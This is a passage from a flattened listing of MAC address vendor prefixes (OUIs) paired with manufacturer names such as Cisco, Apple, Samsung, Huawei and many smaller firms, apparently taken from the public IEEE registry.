Cisco-Linksys, LLC 00252E Cisco SPVTG 54D46F Cisco SPVTG A4A24A Cisco SPVTG 0010F6 Cisco Systems, Inc 0010A6 Cisco Systems, Inc F0B2E5 Cisco Systems, Inc 5897BD Cisco Systems, Inc 5C838F Cisco Systems, Inc ECBD1D Cisco Systems, Inc 88F031 Cisco Systems, Inc 1CDEA7 Cisco Systems, Inc F07F06 Cisco Systems, Inc BC16F5 Cisco Systems, Inc FC5B39 Cisco Systems, Inc 346F90 Cisco Systems, Inc 002332 Apple, Inc. 00236C Apple, Inc. 0023DF Apple, Inc. 002500 Apple, Inc. 0025BC Apple, Inc. 34159E Apple, Inc. 58B035 Apple, Inc. 0010FA Apple, Inc. 0050E4 Apple, Inc. 000D93 Apple, Inc. 0019E3 Apple, Inc. 001B63 Apple, Inc. 001EC2 Apple, Inc. 001FF3 Apple, Inc. 5CFC66 Cisco Systems, Inc D46D50 Cisco Systems, Inc 74A02F Cisco Systems, Inc F4CFE2 Cisco Systems, Inc A80C0D Cisco Systems, Inc 7CFADF Apple, Inc. 28E02C Apple, Inc. E0B9BA Apple, Inc. 00C610 Apple, Inc. 78A3E4 Apple, Inc. 5C5948 Apple, Inc. C8BCC8 Apple, Inc. 24AB81 Apple, Inc. E0F847 Apple, Inc. 28E7CF Apple, Inc. 0C3021 Apple, Inc. DC86D8 Apple, Inc. 90B931 Apple, Inc. D0E140 Apple, Inc. 24A2E1 Apple, Inc. E4CE8F Apple, Inc. E8040B Apple, Inc. 145A05 Apple, Inc. 148FC6 Apple, Inc. 286AB8 Apple, Inc. 7CD1C3 Apple, Inc. F0DCE2 Apple, Inc. A82066 Apple, Inc. BC52B7 Apple, Inc. 1CABA7 Apple, Inc. C0847A Apple, Inc. B8F6B1 Apple, Inc. 8CFABA Apple, Inc. 1CE62B Apple, Inc. 881FA1 Apple, Inc. C8E0EB Apple, Inc. 98B8E3 Apple, Inc. 885395 Apple, Inc. 786C1C Apple, Inc. 4C8D79 Apple, Inc. 285AEB Apple, Inc. FCFC48 Apple, Inc. 9C293F Apple, Inc. 80A1AB Intellisis 84285A Saffron Solutions Inc D4B8FF Home Control Singapore Pte Ltd 04214C Insight Energy Ventures LLC F832E4 ASUSTek COMPUTER INC. 80EA96 Apple, Inc. 600308 Apple, Inc. 04F13E Apple, Inc. 98F0AB Apple, Inc. 7831C1 Apple, Inc. A8667F Apple, Inc. D02598 Apple, Inc. 087402 Apple, Inc. 94F6A3 Apple, Inc. 98E0D9 Apple, Inc. CC29F5 Apple, Inc. 748114 Apple, Inc. 18F643 Apple, Inc. A45E60 Apple, Inc. A01828 Apple, Inc. D0034B Apple, Inc. 10417F Apple, Inc. 80BE05 Apple, Inc. 24A074 Apple, Inc. F02475 Apple, Inc. 2C1F23 Apple, Inc. 549F13 Apple, Inc. F0DBE2 Apple, Inc. 783A84 Apple, Inc. 5C8D4E Apple, Inc. 8863DF Apple, Inc. 84788B Apple, Inc. 0C3E9F Apple, Inc. 40862E JDM MOBILE INTERNET SOLUTION CO., LTD. 58F496 Source Chain 587F57 Apple, Inc. 84A423 Sagemcom Broadband SAS 98F428 zte corporation A4CC32 Inficomm Co., Ltd E8343E Beijing Infosec Technologies Co., LTD. 346987 zte corporation D07C2D Leie IOT technology Co., Ltd EC64E7 MOCACARE Corporation C8A2CE Oasis Media Systems LLC 88947E Fiberhome Telecommunication Technologies Co.,LTD 3C7873 Airsonics 9C88AD Fiberhome Telecommunication Technologies Co.,LTD 988744 Wuxi Hongda Science and Technology Co.,LTD 006D52 Apple, Inc. C4BBEA Pakedge Device and Software Inc 38F557 JOLATA, INC. 4054E4 Wearsafe Labs Inc 305A3A ASUSTek COMPUTER INC. 70BF3E Charles River Laboratories A8C87F Roqos, Inc. A03299 Lenovo (Beijing) Co., Ltd. 5CCF7F Espressif Inc. 681295 Lupine Lighting Systems GmbH 90DFFB HOMERIDER SYSTEMS 2C081C OVH C08488 Finis Inc 3C831E CKD Corporation 54A3FA BQT Solutions (Australia)Pty Ltd ACEE9E Samsung Electronics Co.,Ltd B857D8 Samsung Electronics Co.,Ltd 7011AE Music Life LTD ACC51B Zhuhai Pantum Electronics Co., Ltd. B844D9 Apple, Inc. 385F66 Cisco SPVTG 9C7A03 Ciena Corporation 246C8A YUKAI Engineering 041E7A DSPWorks 1C497B Gemtek Technology Co., Ltd. 2CCF58 HUAWEI TECHNOLOGIES CO.,LTD D09380 Ducere Technologies Pvt. Ltd. 68F956 Objetivos y Servicio de Valor Añadido 84A788 Perples AC60B6 Ericsson AB 14B370 Gigaset Digital Technology (Shenzhen) Co., Ltd. C8A9FC Goyoo Networks Inc. 444CA8 Arista Networks 7C2BE1 Shenzhen Ferex Electrical Co.,Ltd 5031AD ABB Global Industries and Services Private Limited 6889C1 HUAWEI TECHNOLOGIES CO.,LTD 143EBF zte corporation FC2FEF UTT Technologies Co., Ltd. 20F510 Codex Digital Limited A8741D PHOENIX CONTACT Electronics GmbH FCFEC2 Invensys Controls UK Limited 689AB7 Atelier Vision Corporation A8D828 Ascensia Diabetes Care B869C2 Sunitec Enterprise Co., Ltd. 88CBA5 Suzhou Torchstar Intelligent Technology Co.,Ltd F09A51 Shanghai Viroyal Electronic Technology Company Limited 7CA23E HUAWEI TECHNOLOGIES CO.,LTD A4C138 Telink Semiconductor (Taipei) Co. Ltd. 4CB82C Cambridge Mobile Telematics, Inc. E4A32F Shanghai Artimen Technology Co., Ltd. F4672D ShenZhen Topstar Technology Company A48D3B Vizio, Inc 1C56FE Motorola Mobility LLC, a Lenovo Company 501AA5 GN Netcom A/S BCEB5F Fujian Beifeng Telecom Technology Co., Ltd. B899B0 Cohere Technologies D85DEF Busch-Jaeger Elektro GmbH F0AB54 MITSUMI ELECTRIC CO.,LTD. 14157C TOKYO COSMOS ELECTRIC CO.,LTD. 20E407 Spark srl 887384 Toshiba 046169 MEDIA GLOBAL LINKS CO., LTD. D09DAB TCT mobile ltd 3C3178 Qolsys Inc. 809FAB Fiberhome Telecommunication Technologies Co.,LTD E00370 ShenZhen Continental Wireless Technology Co., Ltd. 88A2D7 HUAWEI TECHNOLOGIES CO.,LTD 00323A so-logic 08ECA9 Samsung Electronics Co.,Ltd AC5A14 Samsung Electronics Co.,Ltd E04B45 Hi-P Electronics Pte Ltd F46A92 SHENZHEN FAST TECHNOLOGIES CO.,LTD F0D657 ECHOSENS C8E130 Milkyway Group Ltd 1CC586 Absolute Acoustics 24B0A9 Shanghai Mobiletek Communication Ltd. AC562C LAVA INTERNATIONAL(H.K) LIMITED FC9AFA Motus Global Inc. 9C37F4 HUAWEI TECHNOLOGIES CO.,LTD 3C4711 HUAWEI TECHNOLOGIES CO.,LTD 5CEB68 Cheerstar Technology Co., Ltd 1CF03E Wearhaus Inc. 24693E innodisk Corporation C0DC6A Qingdao Eastsoft Communication Technology Co.,LTD 486EFB Davit System Technology Co., Ltd. B0966C Lanbowan Technology Ltd. 407FE0 Glory Star Technics (ShenZhen) Limited 805067 W & D TECHNOLOGY CORPORATION 247656 Shanghai Net Miles Fiber Optics Technology Co., LTD. F8CFC5 Motorola Mobility LLC, a Lenovo Company 70DA9C TECSEN 7840E4 Samsung Electronics Co.,Ltd E09971 Samsung Electronics Co.,Ltd 2CA2B4 Fortify Technologies, LLC 146B72 Shenzhen Fortune Ship Technology Co., Ltd. B8F080 SPS, INC. C43ABE Sony Corporation 883B8B Cheering Connection Co. Ltd. E4F939 Minxon Hotel Technology INC. 78F944 Private 5C5B35 Mist Systems, Inc. A47B85 ULTIMEDIA Co Ltd, ECBAFE GIROPTIC 3C2C94 杭州德澜科技有限公司(HangZhou Delan Technology Co.,Ltd) 847303 Letv Mobile and Intelligent Information Technology (Beijing) Corporation Ltd. 241B44 Hangzhou Tuners Electronics Co., Ltd 3CC2E1 XINHUA CONTROL ENGINEERING CO.,LTD E48501 Geberit International AG 206274 Microsoft Corporation E8162B IDEO Security Co., Ltd. 80A85D Osterhout Design Group ACCAAB Virtual Electric Inc 485415 NET RULES TECNOLOGIA EIRELI E0FFF7 Softiron Inc. 8C873B Leica Camera AG 78E980 RainUs Co.,Ltd 10D38A Samsung Electronics Co.,Ltd 142971 NEMOA ELECTRONICS (HK) CO. LTD B47356 Hangzhou Treebear Networking Co., Ltd. 346895 Hon Hai Precision Ind. Co.,Ltd. 349E34 Evervictory Electronic Co.Ltd 3CB792 Hitachi Maxell, Ltd., Optronics Division D89341 General Electric Global Research 700FC7 SHENZHEN IKINLOOP TECHNOLOGY CO.,LTD. F8B2F3 GUANGZHOU BOSMA TECHNOLOGY CO.,LTD 5C966A RTNET BC74D7 HangZhou JuRu Technology CO.,LTD 28D98A Hangzhou Konke Technology Co.,Ltd. 003560 Rosen Aviation F8BC41 Rosslare Enterprises Limited 78EB14 SHENZHEN FAST TECHNOLOGIES CO.,LTD 3C4937 ASSMANN Electronic GmbH 844464 ServerU Inc 3C6A9D Dexatek Technology LTD. BCBC46 SKS Welding Systems GmbH D88039 Microchip Technology Inc. 1C9ECB Beijing Nari Smartchip Microelectronics Company Limited DCC622 BUHEUNG SYSTEM 8870EF SC Professional Trading Co., Ltd. C40880 Shenzhen UTEPO Tech Co., Ltd. 582136 KMB systems, s.r.o. 800902 Keysight Technologies, Inc. 0499E6 Shenzhen Yoostar Technology Co., Ltd 902CC7 C-MAX Asia Limited 94C038 Tallac Networks 6836B5 DriveScale, Inc. 70FF5C Cheerzing Communication(Xiamen)Technology Co.,Ltd 14F893 Wuhan FiberHome Digital Technology Co.,Ltd. 9816EC IC Intracom 90179B Nanomegas 4C48DA Beijing Autelan Technology Co.,Ltd 38B1DB Hon Hai Precision Ind. Co.,Ltd. 34F6D2 Panasonic Taiwan Co.,Ltd. 307512 Sony Corporation D48F33 Microsoft Corporation 34B7FD Guangzhou Younghead Electronic Technology Co.,Ltd B47C29 Shenzhen Guzidi Technology Co.,Ltd 54F876 ABB AG 84930C InCoax Networks Europe AB 1CA2B1 ruwido austria gmbh 384B76 AIRTAME ApS 205CFA Yangzhou ChangLian Network Technology Co,ltd. 64002D Powerlinq Co., LTD 489D18 Flashbay Limited B41780 DTI Group Ltd D062A0 China Essence Technology (Zhumadian) Co., Ltd. 20A99B Microsoft Corporation 604826 Newbridge Technologies Int. Ltd. 90203A BYD Precision Manufacture Co.,Ltd D80CCF C.G.V. S.A.S. 38F33F TATSUNO CORPORATION 3CD9CE Eclipse WiFi 6077E2 Samsung Electronics Co.,Ltd FC1910 Samsung Electronics Co.,Ltd 4CBB58 Chicony Electronics Co., Ltd. A41242 NEC Platforms, Ltd. C40006 Lipi Data Systems Ltd. 38262B UTran Technology FC790B Hitachi High Technologies America, Inc. 480C49 NAKAYO Inc D00AAB Yokogawa Digital Computer Corporation 98F170 Murata Manufacturing Co., Ltd. 04C991 Phistek INC. 686E48 Prophet Electronic Technology Corp.,Ltd 14B484 Samsung Electronics Co.,Ltd C4C9EC Gugaoo HK Limited 3CA10D Samsung Electronics Co.,Ltd 646CB2 Samsung Electronics Co.,Ltd 680571 Samsung Electronics Co.,Ltd 8401A7 Greyware Automation Products, Inc 6081F9 Helium Systems, Inc 50C7BF TP-LINK TECHNOLOGIES CO.,LTD. 209AE9 Volacomm Co., Ltd 345D10 Wytek 6C14F7 Erhardt+Leimer GmbH A8A668 zte corporation ACA9A0 Audioengine, Ltd. A481EE Nokia Corporation 78D66F Aristocrat Technologies Australia Pty. Ltd. 441E91 ARVIDA Intelligent Electronics Technology Co.,Ltd. F4C447 Coagent International Enterprise Limited A43D78 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 2053CA Risk Technology Ltd 34E42A Automatic Bar Controls Inc. 20A787 Bointec Taiwan Corporation Limited B0D59D Shenzhen Zowee Technology Co., Ltd 6828BA Dejai A0FC6E Telegrafia a.s. 04572F Sertel Electronics UK Ltd D8977C Grey Innovation BC8D0E Nokia 78923E Nokia Corporation A49F85 Lyve Minds, Inc C4626B ZPT Vigantice EC1766 Research Centre Module A0D12A AXPRO Technology Inc. B05706 Vallox Oy 48EE07 Silver Palm Technologies LLC 00EEBD HTC Corporation A824EB ZAO NPO Introtest 3C89A6 KAPELSE A46CC1 LTi REEnergy GmbH 205A00 Coval C40E45 ACK Networks,Inc. A8B9B3 ESSYS 6C09D6 Digiquest Electronics LTD 447098 MING HONG TECHNOLOGY (SHEN ZHEN) LIMITED 481842 Shanghai Winaas Co. Equipment Co. Ltd. 2C534A Shenzhen Winyao Electronic Limited A4BBAF Lime Instruments F490CA Tensorcom D4319D Sinwatec B068B6 Hangzhou OYE Technology Co. Ltd E44C6C Shenzhen Guo Wei Electronic Co,. Ltd. 38F708 National Resource Management, Inc. E0DB88 Open Standard Digital-IF Interface for SATCOM Systems 282246 Beijing Sinoix Communication Co., LTD 9C65F9 AcSiP Technology Corp. 487604 Private 9CBD9D SkyDisk, Inc. 74C621 Zhejiang Hite Renewable Energy Co.,LTD A8574E TP-LINK TECHNOLOGIES CO.,LTD. 48B977 PulseOn Oy C4824E Changzhou Uchip Electronics Co., LTD. B843E4 Vlatacom 7071B3 Brain Corporation 64E625 Woxu Wireless Co., Ltd 10B713 Private 208986 zte corporation B8266C ANOV France 182012 Aztech Associates Inc. 3C300C Dewar Electronics Pty Ltd 084027 Gridstore Inc. A47760 Nokia Corporation C85663 Sunflex Europe GmbH 88FED6 ShangHai WangYong Software Co., Ltd. 7C72E4 Unikey Technologies 7C2048 KoamTac B07908 Cummings Engineering E47723 zte corporation 9CA9E4 zte corporation 90F3B7 Kirisun Communications Co., Ltd. 44C56F NGN Easy Satfinder (Tianjin) Electronic Co., Ltd B898F7 Gionee Communication Equipment Co,Ltd.ShenZhen 848336 Newrun 5C2AEF r2p Asia-Pacific Pty Ltd B87AC9 Siemens Ltd. F06130 Advantage Pharmacy Services, LLC 98FFD0 Lenovo Mobile Communication Technology Ltd. 38BF2F Espec Corp. A875E2 Aventura Technologies, Inc. 8CB7F7 Shenzhen UniStrong Science & Technology Co., Ltd 18AA45 Fon Technology 94B9B4 Aptos Technology 1C63B7 OpenProducts 237 AB B4527E Sony Corporation 44C4A9 Opticom Communication, LLC 6C3C53 SoundHawk Corp 644214 Swisscom Energy Solutions AG 0CA694 Sunitec Enterprise Co.,Ltd 184462 Riava Networks, Inc. 146080 zte corporation 9CBB98 Shen Zhen RND Electronic Co.,LTD CC720F Viscount Systems Inc. 7060DE LaVision GmbH 502E5C HTC Corporation FCFE77 Hitachi Reftechno, Inc. 70533F Alfa Instrumentos Eletronicos Ltda. 38B74D Fijowave Limited 180C14 iSonea Limited C4E92F AB Sciex A88D7B SunDroid Global limited. C03580 A&R TECH D08A55 Skullcandy 344F3F IO-Power Technology Co., Ltd. 1446E4 AVISTEL D095C7 Pantech Co., Ltd. DC3EF8 Nokia Corporation A49F89 Shanghai Rui Rui Communication Technology Co.Ltd. 50C271 SECURETECH INC 407A80 Nokia Corporation D02C45 littleBits Electronics, Inc. B4A82B Histar Digital Electronics Co., Ltd. 284D92 Luminator 248000 Westcontrol AS 1C4BB9 SMG ENTERPRISE, LLC 902083 General Engine Management Systems Ltd. 14B126 Industrial Software Co D850E6 ASUSTek COMPUTER INC. 3CF748 Shenzhen Linsn Technology Development Co.,Ltd 6C15F9 Nautronix Limited 643F5F Exablaze 742B62 FUJITSU LIMITED E0D1E6 Aliph dba Jawbone 709BFC Bryton Inc. D82D9B Shenzhen G.Credit Communication Technology Co., Ltd ACE42E SK hynix F45F69 Matsufu Electronics distribution Company 28A1EB ETEK TECHNOLOGY (SHENZHEN) CO.,LTD B8F828 Changshu Gaoshida Optoelectronic Technology Co. Ltd. 3C1A57 Cardiopulmonary Corp 541B5D Techno-Innov 205721 Salix Technology CO., Ltd. 883612 SRC Computers, LLC 083571 CASwell INC. 9876B6 Adafruit 503CC4 Lenovo Mobile Communication Technology Ltd. 9CE7BD Winduskorea co., Ltd 3842A6 Ingenieurbuero Stahlkopf 940BD5 Himax Technologies, Inc 54FB58 WISEWARE, Lda 2CCD69 Aqavi.com 8C2F39 IBA Dosimetry GmbH C0A0BB D-Link International 2C7B84 OOO Petr Telegin A4C0C7 ShenZhen Hitom Communication Technology Co..LTD 18104E CEDINT-UPM 789F4C HOERBIGER Elektronik GmbH 346178 The Boeing Company 044F8B Adapteva, Inc. 78FE41 Socus networks 9C1465 Edata Elektronik San. ve Tic. A.Ş. 4C55CC Zentri Pty Ltd 00C5DB Datatech Sistemas Digitales Avanzados SL 8CF945 Power Automation pte Ltd F842FB Yasuda Joho Co.,ltd. 887398 K2E Tekpoint 2C922C Kishu Giken Kogyou Company Ltd,. 882364 Watchnet DVR Inc 581CBD Affinegy 284FCE Liaoning Wontel Science and Technology Development Co.,Ltd. 048D38 Netcore Technology Inc. A4FB8D Hangzhou Dunchong Technology Co.Ltd 107A86 U&U ENGINEERING INC. 40BD9E Physio-Control, Inc 6C5779 Aclima, Inc. C0DA74 Hangzhou Sunyard Technology Co., Ltd. 043D98 ChongQing QingJia Electronics CO.,LTD E03E4A Cavanagh Group International DC6F00 Livescribe, Inc. 54E3B0 JVL Industri Elektronik 306112 PAV GmbH 041B94 Host Mobility AB A0CEC8 CE LINK LIMITED 907A28 Beijing Morncloud Information And Technology Co. Ltd. D8FEE3 D-Link International 50A0BF Alba Fiber Systems Inc. B836D8 Videoswitch 3C977E IPS Technology Limited 58F387 Airios F4CD90 Vispiron Rotec GmbH 542160 Alula 806C8B KAESER KOMPRESSOREN AG 1001CA Ashley Butterworth 246AAB IT-IS International FC4BBC Sunplus Technology Co., Ltd. 3065EC Wistron (ChongQing) F07F0C Leopold Kostal GmbH &Co. KG 4C6255 SANMINA-SCI SYSTEM DE MEXICO S.A. DE C.V. DC825B JANUS, spol. s r.o. 9CA577 Osorno Enterprises Inc. C04301 Epec Oy E07C62 Whistle Labs, Inc. 804B20 Ventilation Control 287994 Realplay Digital Technology(Shenzhen) Co.,Ltd 18D6CF Kurth Electronic GmbH F48139 CANON INC. 1836FC Elecsys International Corporation A4D094 VIVAVIS AG 2C9464 Cincoze Co., Ltd. C419EC Qualisys AB 604A1C SUYIN Corporation 082719 APS systems/electronic AG 505AC6 GUANGDONG SUPER TELECOM CO.,LTD. 74D02B ASUSTek COMPUTER INC. A01C05 NIMAX TELECOM CO.,LTD. B863BC ROBOTIS, Co, Ltd 980D2E HTC Corporation 94B8C5 RuggedCom Inc. 9C79AC Suntec Software(Shanghai) Co., Ltd. D464F7 CHENGDU USEE DIGITAL TECHNOLOGY CO., LTD 601E02 EltexAlatau 542CEA PROTECTRON 60E00E SHINSEI ELECTRONICS CO LTD 545414 Digital RF Corea, Inc 24EB65 SAET I.S. S.r.l. D0F27F SteadyServ Technoligies, LLC E894F6 TP-LINK TECHNOLOGIES CO.,LTD. 188410 CoreTrust Inc. 846223 Shenzhen Coship Electronics Co., Ltd. 1CFA68 TP-LINK TECHNOLOGIES CO.,LTD. DC1DD4 Microstep-MIS spol. s r.o. FCDD55 Shenzhen WeWins wireless Co.,Ltd B01743 EDISON GLOBAL CIRCUITS LLC D0BE2C CNSLink Co., Ltd. 5C8486 Brightsource Industries Israel LTD 50CD32 NanJing Chaoran Science & Technology Co.,Ltd. BCBAE1 AREC Inc. 18FA6F ISC applied systems corp E0EDC7 Shenzhen Friendcom Technology Development Co., Ltd B4DD15 ControlThings Oy Ab E0C6B3 MilDef AB 60601F SZ DJI TECHNOLOGY CO.,LTD 6472D8 GooWi Technology Co.,Limited FC229C Han Kyung I Net Co.,Ltd. 1832A2 LAON TECHNOLOGY CO., LTD. 9498A2 Shanghai LISTEN TECH.LTD DC2BCA Zera GmbH C0885B SnD Tech Co., Ltd. 3CFB96 Emcraft Systems LLC 081F3F WondaLink Inc. 40516C Grandex International Corporation 1853E0 Hanyang Digitech Co.Ltd D4A499 InView Technology Corporation 08482C Raycore Taiwan Co., LTD. 2C26C5 zte corporation 6886E7 Orbotix, Inc. C05E6F V. Stonkaus firma "Kodinis Raktas" D819CE Telesquare C04A00 TP-LINK TECHNOLOGIES CO.,LTD. 045FA7 Shenzhen Yichen Technology Development Co.,LTD 94C962 Teseq AG DC2A14 Shanghai Longjing Technology Co. C011A6 Fort-Telecom ltd. C0B8B1 BitBox Ltd F82EDB RTW GmbH & Co. KG 808B5C Shenzhen Runhuicheng Technology Co., Ltd 105F06 Actiontec Electronics, Inc 087999 AIM GmbH 00C14F DDL Co,.ltd. 807B1E Corsair Memory, Inc. B4AB2C MtM Technology Corporation 74372F Tongfang Shenzhen Cloudcomputing Technology Co.,Ltd E8A364 Signal Path International / Peachtree Audio BC51FE Swann communications Pty Ltd E0CEC3 ASKEY COMPUTER CORP F0219D Cal-Comp Electronics & Communications Company Ltd. 181725 Cameo Communications, Inc. 8462A6 EuroCB (Phils), Inc. 84C8B1 Incognito Software Systems Inc. 30D357 Logosol, Inc. BC39A6 CSUN System Technology Co.,LTD ECB541 SHINANO E and E Co.Ltd. DCC0DB Shenzhen Kaiboer Technology Co., Ltd. AC5D10 Pace Americas 88F490 Jetmobile Pte Ltd 1C9179 Integrated System Technologies Ltd 38F597 home2net GmbH A875D6 FreeTek International Co., Ltd. 10A743 SK Mtek Limited 547FA8 TELCO systems, s.r.o. 5474E6 Webtech Wireless C46DF1 DataGravity FC626E Beijing MDC Telecom E4F365 Time-O-Matic, Inc. E4C146 Objetivos y Servicios de Valor A D40057 MC Technologies GmbH 34FA40 Guangzhou Robustel Technologies Co., Limited 1C5A6B Philips Electronics Nederland BV 94FD2E Shanghai Uniscope Technologies Co.,Ltd A0BAB8 Pixon Imaging 74E424 APISTE CORPORATION 789F87 Siemens AG I IA PP PRM 5CE0F6 NIC.br- Nucleo de Informacao e Coordenacao do Ponto BR C83D97 Nokia Corporation 0CF361 Java Information B0358D Nokia Corporation D410CF Huanshun Network Science and Technology Co., Ltd. 6CB311 Shenzhen Lianrui Electronics Co.,Ltd D8D5B9 Rainforest Automation, Inc. 2411D0 Chongqing Ehs Science and Technology Development Co.,Ltd. B461FF Lumigon A/S A0A130 DLI Taiwan Branch office F8E4FB Actiontec Electronics, Inc 8C4AEE GIGA TMS INC 34C99D EIDOLON COMMUNICATIONS TECHNOLOGY CO. LTD. 802FDE Zurich Instruments AG 5C38E0 Shanghai Super Electronics Technology Co.,LTD 30215B Shenzhen Ostar Display Electronic Co.,Ltd CC593E Sensium Healthcare Limited ECE915 STI Ltd 80D733 QSR Automations, Inc. 303D08 GLINTT TES S.A. A81FAF KRYPTON POLSKA 08E5DA NANJING FUJITSU COMPUTER PRODUCTS CO.,LTD. 5884E4 IP500 Alliance e.V. 600F77 SilverPlus, Inc ACE64B Shenzhen Baojia Battery Technology Co., Ltd. 08AF78 Totus Solutions, Inc. 044BFF GuangZhou Hedy Digital Technology Co., Ltd 30FD11 MACROTECH (USA) INC. 6032F0 Mplus technology D8AF3B Hangzhou Bigbright Integrated communications system Co.,Ltd 2829D9 GlobalBeiMing technology (Beijing)Co. Ltd 88615A Siano Mobile Silicon Ltd. 70E24C SAE IT-systems GmbH & Co. KG D0738E DONG OH PRECISION CO., LTD. 64C944 LARK Technologies, Inc 1C9492 RUAG Schweiz AG B889CA ILJIN ELECTRIC Co., Ltd. 64F50E Kinion Technology Company Limited 601929 VOLTRONIC POWER TECHNOLOGY(SHENZHEN) CORP. 48B253 Marketaxess Corporation 305D38 Beissbarth 60D2B9 REALAND BIO CO., LTD. 0C93FB BNS Solutions E44F5F EDS Elektronik Destek San.Tic.Ltd.Sti E86D54 Digit Mobile Inc E8718D Elsys Equipamentos Eletronicos Ltda 00FD4C NEVATEC 144319 Creative&Link Technology Limited 1848D8 Fastback Networks C8C791 Zero1.tv GmbH ECD925 RAMI 005D03 Xilinx, Inc D04CC1 SINTRONES Technology Corp. 503F56 Syncmold Enterprise Corp 8CEEC6 Precepscion Pty. Ltd. C4DA26 NOBLEX SA 7CC8AB Acro Associates, Inc. 10F3DB Gridco Systems, Inc. 101248 ITG, Inc. 74943D AgJunction D8AFF1 Panasonic Appliances Company 2C6289 Regenersis (Glenrothes) Ltd 58ECE1 Newport Corporation 4C09B4 zte corporation 58CF4B Lufkin Industries 68B43A WaterFurnace International, Inc. 4C7897 Arrowhead Alarm Products Ltd B0C83F Jiangsu Cynray IOT Co., Ltd. 3CF392 Virtualtek. Co. Ltd 149FE8 Lenovo Mobile Communication Technology Ltd. BCD940 ASR Co,.Ltd. 049C62 BMT Medical Technology s.r.o. 0C2A69 electric imp, incorporated C455C2 Bach-Simpson 00E8AB Meggitt Training Systems, Inc. B4218A Dog Hunter LLC F0D3E7 Sensometrix SA B01266 Futaba-Kikaku 7CC8D0 TIANJIN YAAN TECHNOLOGY CO., LTD. 88E917 Tamaggo 909DE0 Newland Design + Assoc. Inc. 709BA5 Shenzhen Y&D Electronics Co.,LTD. B48910 Coster T.E. S.P.A. 44E8A5 Myreka Technologies Sdn. Bhd. B482C5 Relay2, Inc. 985E1B ConversDigital Co., Ltd. 60D1AA Vishal Telecommunications Pvt Ltd D48CB5 Cisco Systems, Inc 388AB7 ITC Networks BCC23A Thomson Video Networks ACC2EC CLT INT'L IND. CORP. A865B2 DONGGUAN YISHANG ELECTRONIC TECHNOLOGY CO., LIMITED E8D0FA MKS Instruments Deutschland GmbH 98262A Applied Research Associates, Inc 3C9174 ALONG COMMUNICATION TECHNOLOGY FC5090 SIMEX Sp. z o.o. 60B982 RO.VE.R. Laboratories S.p.A. DC37D2 Hunan HKT Electronic Technology Co., Ltd 549D85 EnerAccess inc B0750C QA Cafe B4E1EB Private B46238 Exablox C8BBD3 Embrane ECD19A Zhuhai Liming Industries Co., Ltd 348137 UNICARD SA 38B12D Sonotronic Nagel GmbH E83EFB GEODESIC LTD. 9CE10E NCTech Ltd A06D09 Intelcan Technosystems Inc. 60F3DA Logic Way GmbH ACEE3B 6harmonics Inc 1C6BCA Mitsunami Co., Ltd. 642400 Xorcom Ltd. 3C363D Nokia Corporation 808698 Netronics Technologies Inc. 407074 Life Technology (China) Co., Ltd 20F002 MTData Developments Pty. Ltd. 1CF4CA Private B4A4B5 Zen Eye Co.,Ltd 2C750F Shanghai Dongzhou-Lawton Communication Technology Co. Ltd. 5C5015 Cisco Systems, Inc 141A51 Treetech Sistemas Digitais 587FC8 S2M 200505 RADMAX COMMUNICATION PRIVATE LIMITED AC1461 ATAW Co., Ltd. E4C6E6 Mophie, LLC 502D1D Nokia Corporation F48E09 Nokia Corporation 8C57FD LVX Western 54E63F ShenZhen LingKeWeiEr Technology Co., Ltd. 20FABB Cambridge Executive Limited 8020AF Trade FIDES, a.s. 3CB87A Private 088F2C Amber Technology Ltd. 441319 WKK TECHNOLOGY LTD. 3C9F81 Shenzhen CATIC Bit Communications Technology Co.,Ltd 445F7A Shihlin Electric & Engineering Corp. 5848C0 COFLEC 18B591 I-Storm 002D76 TITECH GmbH 8C604F Cisco Systems, Inc A4B980 Parking BOXX Inc. A47C14 ChargeStorm AB 980284 Theobroma Systems GmbH 1CD40C Kriwan Industrie-Elektronik GmbH F8DB4C PNY Technologies, INC. 0C9D56 Consort Controls Ltd A05E6B MELPER Co., Ltd. D878E5 KUHN SA D824BD Cisco Systems, Inc 28CD1C Espotel Oy D443A8 Changzhou Haojie Electric Co., Ltd. BCE59F WATERWORLD Technology Co.,LTD C035BD Velocytech Aps 287184 Spire Payments 7CB03E OSRAM GmbH BC8B55 NPP ELIKS America Inc. DBA T&M Atlantic C0493D MAITRISE TECHNOLOGIQUE DC3E51 Solberg & Andersen AS AC0DFE Ekon GmbH - myGEKKO FC5B26 MikroBits 40F407 Nintendo Co., Ltd. 900A3A PSG Plastic Service GmbH 844915 vArmour Networks, Inc. C84544 Asia Pacific CIS (Wuxi) Co, Ltd 50ED94 EGATEL SL 48A22D Shenzhen Huaxuchang Telecom Technology Co.,Ltd C86000 ASUSTek COMPUTER INC. 70A66A Prox Dynamics AS E0EF25 Lintes Technology Co., Ltd. B01C91 Elim Co 04F17D Tarana Wireless 7041B7 Edwards Lifesciences LLC DCA8CF New Spin Golf, LLC. A849A5 Lisantech Co., Ltd. C467B5 Libratone A/S 4C3910 Newtek Electronics co., Ltd. 2CBE97 Ingenieurbuero Bickele und Buehler GmbH F0620D Shenzhen Egreat Tech Corp.,Ltd 2C67FB ShenZhen Zhengjili Electronics Co., LTD 843611 hyungseul publishing networks 3440B5 IBM 98BC57 SVA TECHNOLOGIES CO.LTD DC3C2E Manufacturing System Insights, Inc. 903AA0 Nokia B06CBF 3ality Digital Systems GmbH C81AFE DLOGIC GmbH EC63E5 ePBoard Design LLC 94DB49 SITCORP 3CE5B4 KIDASEN INDUSTRIA E COMERCIO DE ANTENAS LTDA 08D09F Cisco Systems, Inc D4D748 Cisco Systems, Inc 344F69 EKINOPS SAS F8313E endeavour GmbH 143605 Nokia Corporation F83553 Magenta Research Ltd. F4044C ValenceTech Limited 3497FB ADVANCED RF TECHNOLOGIES INC F03A55 Omega Elektronik AS 54D0ED AXIM Communications 644BF0 CalDigit, Inc 64ED62 WOORI SYSTEMS Co., Ltd 2C002C UNOWHY 5CC9D3 PALLADIUM ENERGY ELETRONICA DA AMAZONIA LTDA B4944E WeTelecom Co., Ltd. E00B28 Inovonics 48022A B-Link Electronic Limited C4EEAE VSS Monitoring F8D3A9 AXAN Networks 24E6BA JSC Zavod im. Kozitsky CCA374 Guangdong Guanglian Electronic Technology Co.Ltd 58677F Clare Controls Inc. 70CA9B Cisco Systems, Inc C87CBC Valink Co., Ltd. B81413 Keen High Holding(HK) Ltd. 68BC0C Cisco Systems, Inc CC6BF1 Sound Masking Inc. 18E80F Viking Electronics Inc. 2C9717 I.C.Y. B.V. 988217 Disruptive Ltd 9CA3BA SAKURA Internet Inc. 0C5A19 Axtion Sdn Bhd A8BD1A 